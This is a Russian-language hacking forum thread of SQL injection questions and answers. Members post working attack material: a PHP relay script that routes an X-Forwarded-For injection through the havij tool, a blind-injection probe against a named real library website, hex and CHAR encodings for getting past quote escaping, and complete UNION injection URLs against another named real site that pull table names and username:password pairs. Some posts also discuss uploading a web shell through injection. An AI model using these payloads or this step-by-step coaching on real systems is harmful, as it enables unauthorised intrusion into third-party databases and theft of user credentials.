Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,028
    Reputations:
    1,228
    Tamper Data облегчает процесс, но не автоматизирует его. Этим вполне может заняться связка havij + php:

    PHP:
    <?php
    $sqli 
    $_GET['sqli'];
    $packet "GET /script.php HTTP/1.1
    Host: victim.com
    Connection: close
    X-Forwarded-For: 127.0.0.
    $sqli
    \n"
    ;

    $fp fsockopen("victim.com""80");
    fwrite($fp$packet);
    while (!
    feof($fp)) {
            
    $out .= fgets($fp1024);
    }
    fclose($fp);
    echo 
    $out;
    Далее заливаем скрипт на локалхост и скармливаем havij'у ссылку
    Проблема с SSL решается аналогично.

    enjoy
     
    _________________________
    #21721 +toxa+, 6 Jan 2013
    Last edited by a moderator: 7 Jan 2013
    3 people like this.
  2. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    Есть иньекция, все бы было хорошо, но имя базы содержит знак тире " - ", в итоге при from data-base.users вылазит ошибка в синтаксисе, как можно обойти?
     
  3. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    `data-base`.users
     
    1 person likes this.
  4. Artrix

    Artrix New Member

    Joined:
    13 Dec 2012
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Вечер добрый. Допустим есть такой сайт:
    http://www.site.ru/catalog/detailed/22/
    Подставляю ' вылазит Mysql ошибка. Как данную уязвимость раскручивать?
     
  5. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    374
    Likes Received:
    343
    Reputations:
    99
    Как и все остальные, разве что может получиться так, что придется делать без пробельный вариант или заменять их на /**/ например!
     
  6. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    288
    Likes Received:
    42
    Reputations:
    -5
    помогите
    уязвимость вроде есть а чёт не получается дальше раскрутить
    http://www.shpl.ru/shpage.php?menu=2343'

    Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/shpl.d2/bib/set.inc on line 159
     
  7. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    374
    Likes Received:
    343
    Reputations:
    99
    Code:
    http://www.shpl.ru/shpage.php?menu=2343) and mid(version(),1,1)=3 and (1=1
    Версия 3, тогда небыло не UNION не даже подзапросов, так что только слепые методы тебе помогут!
     
    3 people like this.
  8. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    233
    Likes Received:
    47
    Reputations:
    20
    Как залить шелл через sqli методом error based?
     
  9. m00c0w

    m00c0w Banned

    Joined:
    25 Dec 2011
    Messages:
    103
    Likes Received:
    14
    Reputations:
    5
    если file_priv есть, в чем проблема?
     
  10. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    374
    Likes Received:
    343
    Reputations:
    99
    Проблем может быть куча, начиная от magic_quotes и заканчивая не знанием путей, хотя последнее чаще всего решается! ;)
     
  11. comynicator

    comynicator New Member

    Joined:
    20 Mar 2012
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Что посоветуете?

    Допустим нужно узнать привилегии но magic_quotes=on
    Понимаю или чарить или хек.Вопрос пробиваю user() пишет Future_future2@localhost
    Что именно тут имя юзера? Полностью или до @?И как вставить имя в хек или чар?
     
  12. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    374
    Likes Received:
    343
    Reputations:
    99
    User - Future_future2
    HEX - 0x4675747572655f66757475726532
    CHAR(MySQL) - CHAR(70, 117, 116, 117, 114, 101, 95, 102, 117, 116, 117, 114, 101, 50)
     
  13. comynicator

    comynicator New Member

    Joined:
    20 Mar 2012
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Спасибо за ответ.вот зачарено
    http://www.site.com/fin-detail.php?id=173/**/union/**/all/**/select/**/1,file_priv,3,4,5,6,7,8,9,10,11/**/from/**/mysql.user/**/where/**/user=char(70,117,116,117,114,101,95,102,117,116,117,114,101,50)--
    Ответ
    SELECT command denied to user 'Future_future2'@'localhost' for table 'user'
    Вот хек
    http://www.site.com/fin-detail.php?id=173/**/union/**/all/**/select/**/1,file_priv,3,4,5,6,7,8,9,10,11/**/from/**/mysql.user/**/where/**/user=0x4675747572655f66757475726532--
    ответ
    SELECT command denied to user 'Future_future2'@'localhost' for table 'user'
     
    #21733 comynicator, 13 Jan 2013
    Last edited: 13 Jan 2013
  14. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    359
    Likes Received:
    178
    Reputations:
    108

    А матчасть почитать сначала??? Ясно же написано что вышеуказанный пользователь не имеет прав на доступ к системной таблице mysql!
     
  15. FunOfGun

    FunOfGun Elder - Старейшина

    Joined:
    5 Sep 2012
    Messages:
    388
    Likes Received:
    71
    Reputations:
    124
    Здравствуйте, помогите, туплю. http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15+from+information_schema.tables+--+ есть таблица ltw_usersv4, в ней есть колонка username, пытаюсь достать ее так: http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,username,12,13,14,15+from+ltw_usersv4+limit+0,1+--+ и ничего не получаю. Что я делаю не так? Заранее благодарен.
     
  16. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    374
    Likes Received:
    343
    Reputations:
    99
    Code:
     http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,username,password),12,13,14,15+from+Marketing.ltw_usersv4--+
    Эта таблица находится в другой бд, в твоей ничего подобного нет. Учти другая БД - может быть другой сайт! ;)
     
    1 person likes this.
  17. FunOfGun

    FunOfGun Elder - Старейшина

    Joined:
    5 Sep 2012
    Messages:
    388
    Likes Received:
    71
    Reputations:
    124
    Еще один глупый вопрос: как определить к какой именно базе прнадлежит таблица?
     
  18. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    937
    Likes Received:
    355
    Reputations:
    58
    FunOfGun,
    Code:
    http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,table_schema,12,13,14,15+from+information_schema.tables+where+table_name='ltw_usersv4'+--+
     
    1 person likes this.
  19. bestoloch

    bestoloch New Member

    Joined:
    13 Sep 2012
    Messages:
    8
    Likes Received:
    3
    Reputations:
    10
    вытаскивай просто таблицы подобными запросами:

    SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’

    Узнать текущую базу:

    SELECT database()
     
  20. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    233
    Likes Received:
    47
    Reputations:
    20
    [​IMG] Как раскрутить? Запрос был '+order+by+100
     
Thread Status:
Not open for further replies.